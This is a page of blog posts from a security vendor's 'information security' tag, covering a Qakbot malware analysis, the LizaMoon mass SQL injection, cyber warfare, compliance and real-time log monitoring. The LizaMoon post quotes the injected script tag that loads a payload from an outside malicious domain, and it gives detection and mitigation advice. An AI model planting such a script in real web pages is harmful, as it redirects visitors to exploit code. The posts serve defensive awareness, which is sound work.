Posts tagged: 'information security'

The following posts are associated with the tag you have selected. You may subscribe to the RSS feed for this tag to receive future updates relevant to the topic(s) of your interest.

http://blog.logrhythm.com/tags/information-security/feed
 
 

Qakbot: Still targeting Corporate and Business networks

While the recent Hartford Insurance breach, the subject of an earlier post by Dave Pack, didn’t make a lot of noise, it’s interesting to see an old piece of Malware (first discovered in 2007) like Qakbot still making its rounds in 2011. There are a number of things about this malware that make it particularly interesting.

Although certain Trojans like Zeus that target banking credentials are put up for sale on the black market as crimeware kits, Qakbot does not seem to follow this pattern. While many kinds of Trojans take a more blanket approach to stealing data and passwords, Qakbot is actually designed to differentiate between the data stolen from target devices and other passwords it may have collected on non target machines. Another interesting behavior of the Qakbot is that it also acts as a worm in its attempts to spread via network shares. While this combination of worm/Trojan behavior is not unique, it certainly makes it more dangerous. And if that isn’t enough, Qakbot reportedly employs up to 7 different methods to ensure that it’s not being reverse engineered by security researchers.

Evidence points to the idea that there is a dedicated group of people behind this piece of crimeware. If that’s true, it seems logical that The Hartford Insurance Company will not be the last business to be targeted by the Qakbot.

With that being said, let’s take a look at what a typical Qakbot infection looks like.

First, the Trojan is VMware and if it detects that it’s being run on a VMware virtual machine it will simply not run. Once running however, a dump of the file’s strings from memory gives us quite a bit of insight into what the file will try to do. Evidence of the file’s attempts to thwart security researchers’ attempts can be seen in various places.

Here it checks for the presence of various .exes running:

And here’s another check:

Here we see references to URLs where stolen data will be dumped. Notice the DNS query?

Some information on the data it will be sending out including the version of qbot (qakbot) running:

Out bound IRC traffic:

Based on what we’ve seen in the strings, we can expect to see a variety of logged behavior generated by the Qakbot. Monitoring for unexpected outbound FTP, IRC and port 80 traffic is one way to identify potential Qakbot activity. Also, a shared folder on the network that’s designed to always be empty can be monitored for the presence of new files to capture worm-like behavior.

If you want to know more about how we can help you detect malware with log data, feel free to
contact us.

 

Tags: , , ,

0 Comments | Security

 
 

Initial Thoughts: LizaMoon Mass SQL Injection

While I will be posting a more in-depth analysis of the LizaMoon attack, here are a few early thoughts from Dave Pack while his blogger profile gets set up.  Dave manages LogRhythm’s Knowledge Engineering department and has been working in information security and advanced data analysis for over ten years.

Various security organizations/bloggers are tracking a mass SQL Injection currently being called “LizaMoon” (one of the first websites identified).  While we haven’t a chance to fully analyze the attack, based on information being aggregated by SANS and Stackoverflow, it looks like this is a combination SQL Injection/Stored XSS Attack, the final target being client-side end-users.

It appears that the SQL Injection is taking advantage of a web application vulnerability.  The injection itself is delivering a Stored XSS attack to the vulnerably web servers, consisting of a script (< / title> < script src = http : // google-stats49.info/ur.php >) that redirects unlucky internet users to a different site hosting a file named ur.php.  This php file is where the dirty work is actually done.  It launches an exploit which installs fake AV software on the end-user’s machine.

What’s really interesting is that the SQL injection is really just a means of delivering the much more dangerous Stored XSS to vulnerable web servers.  Stored XSS are much scarier than a standard Reflected XSS because a user doesn’t have to be tricked into clicking a maliciously crafted URL.  The XSS attack is simply sitting on the web server, waiting for any unlucky internet user to browse to the compromised website.

We’re attempting to get our hands on the ur.php code for further analysis of the client-side exploit, after which one of our analysts will be posting an update.  In the meantime, here are some things both web administrators and end users can do to detect this attack and help protect against it.

SQL Injection:

1. Implement standard protections, such as sanitizing all database inputs and using parameterized queries across the board, to limit what can get through.

2. Check if a web server is being targeted by most types of SQL injections.

a. In particular, look at your access logs for “)-” in the URL. It is extremely rare for legitimate input to be commenting out the rest of a SQL statement.

b.  Check for various encodings of the same string as well. LogRhythm provides an out-of-the-box AI Engine advanced correlation rule that looks for these strings in a URL and will alarm on any injection attempts.

Stored XSS:

1. If the functionality is available in your infrastructure, block any attempts to access a website with “ur.php” in the URL.

2. Practice standard “safe browsing” techniques. Many browsers offer a plugin, such as NoScript which forces users to explicitly grant any script permission to run client-side. Use a plugin like this, or disable javascript all together if it’s not needed for business purposes.

Tags: , , ,

0 Comments | Security

 
 

Can you keep a soldier out of your network?

The last year has been full of stunning news about cyber security, and you’ve probably read about cyber incidents suchCyber warfare as HBGary’s hack by Anonymous, the Stuxnet worm, and what looks like a back-and-forth cyber battle between China and the United States (read about these events here, here, here, and here.) These events have become a media circus simply because they all add up to ‘really bad news’ for workers in information technology and information security.

As more information is released about how useful cyber warfare is, or perceived to be (such as Wikileaks’ UN Diplomatic Cables), the more it inspires other countries to create their own cyber warfare capabilities (and here, and here, and even limiting summit talks here).

Backtracking the growth of cyber security over the last 30 years, the main goal has been to stop criminal hackers, disgruntled employees and malicious software. What happens if your organization becomes the target of a military mission? At least 45,000 computers were infected by Stuxnet and now there’s a possibility of your organization becoming the victim of collateral damage as cyber war proliferates.

The Internet isn’t a very good battleground for military warfare, though. In terrestrial warfare, bombs explode destroying the technology involved in functioning of advanced weaponry. Cyber-weapons, on the other hand, are like dropping Rosetta Stones on enemies. All the “zero-day exploits”, obfuscation techniques, tools and control methods are exposed and can be reverse engineered. Those capabilities can be added to the opponent’s arsenal and apparently there are personal safety risks by being involved.

Cyber warfare cartoonIt’s also of great value to be invisible while performing cyber warfare in order to avoid incident. Anonymity techniques can be less than magic and still be very effective; and in many cases can be conducted by contractors and/or non-affiliated hackers. Organizations that maintain a public Internet presence are at a huge disadvantage to these ambushing anonymous aggressors.

Organizations should take cyber warfare very seriously as the latest evolution of computer security. For the next decade or more, companies will hire tens-of-thousands of cyber security experts who will be expected to do no less than keep government sponsored hackers out of their networks.

Proper planning, enforcing security policy and improving situational awareness will be critical for handling the next wave of government funded cyber threats. Access control, usage monitoring, security auditing, vulnerability management, role separation and network segmentation will need to be considered and implemented for all IT projects. SIEM solutions and other security tools will become even more critical to maintaining an up-to-date security posture.

Are you ready for the security risks of the next decade?

Tags: , , ,

0 Comments | Security

 
 

Compliance – Time to Change the Future

groundhog day imageHe’s having the worst day of his life… over and over again.’

Ring any bells? It’s the strap line from the film Groundhog Day which sees Bill Murray’s character, Phil Connors, caught in a time warp – repeatedly waking up to find that things are exactly the same as the day before.

The film charts Connors’ frustration at being faced with the same situations every single day and seemingly unable to start the next day afresh.

Whether it’s travelling the same daily commute, or having repeated discussions about the latest information security regulation directive, I’m sure we’ve all related to that character at some point. Particularly if you are a miserable old curmudgeon like me (in fact I think you will find that Bill Murray based his screen persona on yours truly….)

With a seemingly endless list of new or amended regulations being introduced, it’s no wonder that IT security professionals can often feel like they’re stuck in their own Groundhog Day.  No sooner does an organisation achieve compliance for one regulation, than another comes along, often bringing with it a sense of déjà vu for all involved.

Take the Payment Card Industry Data Security Standard for example. The first standard was introduced in December 2004, with the most recent revision in 2008, and an updated version due this October.  As such, the regulation seems to have been around for an eternity and it’s no wonder that mentioning the subject will trigger a glazed response from many in the industry.

This rings even more true in the public sector where there seems to be a never ending stream of new initiatives and guidelines relating to information management and technology infrastructures. In the UK alone, organisations are faced with, for example, GSI/GCSX, CoCo compliance and latterly Memo 22 replacement, Good Practice Guide 13 (GPG 13.)

Information security is an ever changing beast. As technology evolves, so do the risks posed which is why it’s imperative that organisations -public and private – don’t become complacent when it comes to compliance.

As Bill Murray found in Groundhog Day, the only way to escape the monotony of his time warp was to re-assess his attitude to life. Of course I’m not suggesting for one minute that we turn our lives upside down, but there’s a lot to be said for taking a proactive approach when it comes to guarding against risk.

In every information security related regulation, there’s a requirement in some shape or form to protect the information being held by the organisation – from credit card details to children at risk records.  Despite this, all too often security incidents are discovered after the event, once the damage has been done.

Protective Monitoring tools such as LogRhythm’s bring a new proactive dimension to information security-fulfilling multiple compliance requirements in the process.  By centralising and automating how log data is managed, organisations can gain a clear insight into network and user behaviour.  Any irregular activity is automatically flagged in real-time while reporting for compliance purposes is simpler and less time consuming.

As with most Hollywood films, Bill Murray’s ultimate goal was to get the girl. While I can’t guarantee that LogRhythm will bring similar results, it will help ease the Groundhog Day frustrations for those facing the continued compliance struggle.

Unless you’re happy living in Punxsutawney of course….

Tags: , , , ,

0 Comments | Compliance

 
 

The Importance of Real-Time Analysis for Security and Operations

As I’m sitting out on the back patio enjoying a beautiful spring morning on Mother’s Day morning I thought I’d momentarily press the pause button and delay my familial responsibility for cooking the most amazing breakfast ever, to talk for a bit about the significance of real-time information access as it relates to Log and Event Management (SIEM).

What prompted me to address real-time? The simple fact that there’s been a lot of action in the news the last couple of weeks dealing with the real-time ‘fires’ that need to be put out. Between the recent unsuccessful Times Square Car Bomber to the ‘difficult to wrap-your-head around’ massive oil leaks vomiting hundreds of thousands of barrels of oil into the Gulf, real-time access to relevant is an absolute critical component to our investigative capacity to both identify and stop these types of threats.

Take the Times Square Bomber, Faisal Shahzad, for example. Despite a wealth of forensic data tying him to the bombing attempt, and a relatively quick path to identifying him as a suspect, Shahzad was minutes from successfully fleeing the country on a commercial airliner. Why? Because the process for adding his name to a no-fly list was not in real-time and the TSA was not notified until he had already boarded the plane. Fortunately federal officials were able to turn the plane around before take-off and apprehend him.

Likewise, the Deepwater Horizon oil spill is the result of a combination of process and technical breakdowns. A critical mechanical failure combined with a deadly buildup in methane gas going undetected ultimately caused a catastrophic explosion. The resulting environmental and economic disaster will be felt for years. It’s hard not to wonder what might have been different if the right people were notified of the faulty equipment in time to repair it, or if the methane build-up had been detected and eliminated before reaching critical mass.

And it’s no stretch that these examples are analogous to an enterprise I.T. environment — the power of real-time analysis is unmistakable. I’ve worked in I.T. environments where there was an infection that was undetected by the myriad of security products from the host based security tools to the NIDS product sniffing off the wire. Whether this infection was a zero-day exploit or simply just missed by the security products is another story – either way the question is, ‘How do you identify the root cause and prevent it…rapidly?’ Just as more pieces to a complex puzzle help paint the whole picture, access to log data from disparate sources provide core pieces to the puzzle providing the analyst visibility into the labyrinth of data available to help identify root cause. In order to accomplish this effectively you’ll need ‘fingertip’ access to all log data. Moreover, you’ll want to be able to view the data in real-time, at the time of capture.

In the example above, we were able to quickly identify the port the botnet was communicating on and quickly target the source IP address for communications from internal systems attempting to communicate on that port. This uncovered, in real-time, over 25 systems throughout the enterprise that were infected (by DNS name and IP address) and these systems were quickly removed from the network and cleansed.

Although in this example we’re discussing a security-related issue, the real-time use-case carries over into other parts of our business including operations. Consider a virtualized environment heavily reliant on the underlying system to run hundreds of production systems. What happens if the underlying system has an issue that potentially impacts our production environment? A critical failure in this case could create a significant event, impacting the business as a whole. I’ve dealt with this in the field and real-time access to the log data provided the root cause analysis necessary to understand the issue. This in turn triggered the effort to quickly resolve the ‘now known’ issue. The moral of the story: Immediate access to real-time log data can provide the magnet every analyst needs to quickly find the needle in their haystack.

Okay – I think I hear the kids stirring so I better focus on my wife and family before I get in trouble for working on this, of all days. Happy Mother’s day to all the moms out there.

To see some ideas for how you can help with the environmental cleanup and humanitarian efforts of what is being predicted to be one of the worst environmental catastrophes in United States history, please visit:
http://www.sierraclub.org/
http://crcl.org/
https://secure.oxfamamerica.org/site/Donation2?df_id=4360&4360.donation=form1&JServSessionIdr004=hxfvbljiv1.app240a

 

Tags: , , ,

0 Comments | Security